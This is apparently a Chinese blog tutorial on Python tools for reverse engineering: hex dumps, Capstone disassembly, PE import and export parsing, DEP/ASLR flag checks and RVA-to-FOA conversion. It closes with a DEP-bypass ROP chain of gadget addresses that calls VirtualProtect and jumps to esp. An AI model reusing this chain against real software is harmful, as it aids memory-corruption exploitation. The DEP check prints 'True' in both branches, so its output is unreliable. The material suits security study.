快捷導(dǎo)航

Python進(jìn)制轉(zhuǎn)換與反匯編實(shí)現(xiàn)流程介紹

更新時(shí)間：2022年10月09日 08:29:27 作者：LyShark 孤風(fēng)洗劍

這篇文章主要介紹了Python進(jìn)制轉(zhuǎn)換與反匯編的實(shí)現(xiàn)，文中通過示例代碼介紹的非常詳細(xì)，對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值，需要的朋友們下面隨著小編來一起學(xué)習(xí)吧

通過利用反匯編庫，并使用python編寫工具，讀取PE結(jié)構(gòu)中的基地址偏移地址，找到OEP并計(jì)算成FOA文件偏移，使用反匯編庫對(duì)其進(jìn)行反匯編，并從反匯編代碼里查找事先準(zhǔn)備好的ROP繞過代碼，讓其自動(dòng)完成搜索，這里給出實(shí)現(xiàn)思路與部分代碼片段。

十六進(jìn)制轉(zhuǎn)換器可自行添加上，文件與偏移對(duì)應(yīng)關(guān)系，即可實(shí)現(xiàn)指定位置的數(shù)據(jù)轉(zhuǎn)換，這里給出坑爹版實(shí)現(xiàn)，自己晚膳吧。

#coding:utf-8
import os,sys
import binascii
# binascii.a2b_hex("4d")
if __name__ == "__main__":
    count = 0
    size = os.path.getsize("qq.exe")
    print("文件指針: {}".format(size))
    fp = open("qq.exe","rb")
    lis = []
    for item in range(500):
        char = fp.read(1)
        count = count + 1
        if count % 16 == 0:
            if ord(char) < 16:
                print("0" + hex(ord(char))[2:])
            else:
                print(hex(ord(char))[2:])
        else:
            if ord(char) < 16:
                print("0" + hex(ord(char))[2:] + " ",end="")
            else:
                print(hex(ord(char))[2:] + " ",end="")

二進(jìn)制與字符串互轉(zhuǎn)

import os
def to_ascii(h):
    list_s = []
    for i in range(0, len(h), 2):
        list_s.append(chr(int(h[i:i+2], 16)))
    return ''.join(list_s)
def to_hex(s):
    list_h = []
    for c in s:
        list_h.append(hex(ord(c))[2:])
    return ''.join(list_h)
with open("d://run.exe","rb") as fp:
    lis = []
    for x in range(10240):
        for i in range(64):
            char = fp.read(1)
            print(to_ascii(hex(ord(char))[2:]),end="")
        print("")

反匯編框架

import os
from capstone import *
CODE = b"\x55\x8b\xec\x6a\x00\xff\x15\x44\x30\x11\x00"
md = Cs(CS_ARCH_X86, CS_MODE_32)
for i in md.disasm(CODE, 0x1000):
    print("大小: %3s 地址: %-5s 指令: %-7s 操作數(shù): %-10s"% (i.size,i.address,i.mnemonic,i.op_str))
print("*" * 100)
CODE64 = b"\x55\x48\x8b\x05\xb8\x13\x00\x00\xe9\xea\xbe\xad\xde\xff\x25\x23\x01\x00\x00\xe8\xdf\xbe\xad\xde\x74\xff"
md = Cs(CS_ARCH_X86, CS_MODE_64)
for i in md.disasm(CODE64, 0x1000):
    print("大小: %3s 地址: %-5s 指令: %-7s 操作數(shù): %-10s"% (i.size,i.address,i.mnemonic,i.op_str))

讀取pE結(jié)構(gòu)的代碼讀取導(dǎo)入導(dǎo)出表，用Python 實(shí)在太沒意思了，請(qǐng)看C/C++ 實(shí)現(xiàn)PE解析工具筆記。

def ScanImport(filename):
    pe = pefile.PE(filename)
    print("-" * 100)
    try:
        for x in pe.DIRECTORY_ENTRY_IMPORT:
            for y in x.imports:
                print("[*] 模塊名稱: %-20s 導(dǎo)入函數(shù): %-14s" %((x.dll).decode("utf-8"),(y.name).decode("utf-8")))
    except Exception:
        pass
    print("-" * 100)
def ScanExport(filename):
    pe = pefile.PE(filename)
    print("-" * 100)
    try:
        for exp in pe.DIRECTORY_ENTRY_EXPORT.symbols:
            print("[*] 導(dǎo)出序號(hào): %-5s 模塊地址: %-20s 模塊名稱: %-15s" 
            %(exp.ordinal,hex(pe.OPTIONAL_HEADER.ImageBase + exp.address),(exp.name).decode("utf-8")))
    except:
        pass
    print("-" * 100)

驗(yàn)證DEP+ASLR

    # 隨機(jī)基址 => hex(pe.OPTIONAL_HEADER.DllCharacteristics) & 0x40 == 0x40
    if( (pe.OPTIONAL_HEADER.DllCharacteristics & 64)==64 ):
        print("基址隨機(jī)化: True")
    else:
        print("基址隨機(jī)化: False")
    # 數(shù)據(jù)不可執(zhí)行 DEP => hex(pe.OPTIONAL_HEADER.DllCharacteristics) & 0x100 == 0x100
    if( (pe.OPTIONAL_HEADER.DllCharacteristics & 256)==256 ):
        print("DEP保護(hù)狀態(tài): True")
    else:
        print("DEP保護(hù)狀態(tài): True")
    # 強(qiáng)制完整性=> hex(pe.OPTIONAL_HEADER.DllCharacteristics) & 0x80 == 0x80
    if ( (pe.OPTIONAL_HEADER.DllCharacteristics & 128)==128 ):
        print("強(qiáng)制完整性: True")
    else:
        print("強(qiáng)制完整性: False")
    if ( (pe.OPTIONAL_HEADER.DllCharacteristics & 1024)==1024 ):
        print("SEH異常保護(hù): False")
    else:
        print("SEH異常保護(hù): True")

VA轉(zhuǎn)FOA地址

import os
import pefile
def RVA_To_FOA(FilePath):
    pe = pefile.PE(FilePath)
    ImageBase = pe.OPTIONAL_HEADER.ImageBase
    for item in pe.sections:
        if str(item.Name.decode('UTF-8').strip(b'\x00'.decode())) == ".text":
            #print("虛擬地址: 0x%.8X 虛擬大小: 0x%.8X" %(item.VirtualAddress,item.Misc_VirtualSize))
            VirtualAddress = item.VirtualAddress
            VirtualSize = item.Misc_VirtualSize
            ActualOffset = item.PointerToRawData
    StartVA = hex(ImageBase + VirtualAddress)
    StopVA = hex(ImageBase + VirtualAddress + VirtualSize)
    print("[+] 代碼段起始地址: {} 結(jié)束: {} 實(shí)際偏移:{} 長度: {}".format(StartVA,StopVA,ActualOffset,VirtualSize))
    with open(FilePath,"rb") as fp:
        fp.seek(ActualOffset)
        HexCode = fp.read(VirtualSize)
        print(HexCode)
RVA_To_FOA("d://lyshark.exe")

給出一條過保護(hù)的ROP鏈

rop = struct.pack ('<L',0x7c349614)   # ret
rop += struct.pack('<L',0x7c34728e)   # pop eax
rop += struct.pack('<L',0xfffffcdf)   #
rop += struct.pack('<L',0x7c379c10)   # add ebp,eax
rop += struct.pack('<L',0x7c34728e)   # pop eax
rop += struct.pack('<L',0xfffffdff)   # value = 0x201
rop += struct.pack('<L',0x7c353c73)   # neg eax
rop += struct.pack('<L',0x7c34373a)   # pop ebx
rop += struct.pack('<L',0xffffffff)   #
rop += struct.pack('<L',0x7c345255)   # inc ebx
rop += struct.pack('<L',0x7c352174)   # add ebx,eax
rop += struct.pack('<L',0x7c344efe)   # pop edx
rop += struct.pack('<L',0xffffffc0)   # 0x40h
rop += struct.pack('<L',0x7c351eb1)   # neg edx
rop += struct.pack('<L',0x7c36ba51)   # pop ecx
rop += struct.pack('<L',0x7c38f2f4)   # &writetable
rop += struct.pack('<L',0x7c34a490)   # pop edi
rop += struct.pack('<L',0x7c346c0b)   # ret (rop nop)
rop += struct.pack('<L',0x7c352dda)   # pop esi
rop += struct.pack('<L',0x7c3415a2)   # jmp [eax]
rop += struct.pack('<L',0x7c34d060)   # pop eax
rop += struct.pack('<L',0x7c37a151)   # ptr to virtualProtect()
rop += struct.pack('<L',0x625011ed)   # jmp esp

到此這篇關(guān)于Python進(jìn)制轉(zhuǎn)換與反匯編實(shí)現(xiàn)流程介紹的文章就介紹到這了,更多相關(guān)Python進(jìn)制轉(zhuǎn)換內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家！

您可能感興趣的文章: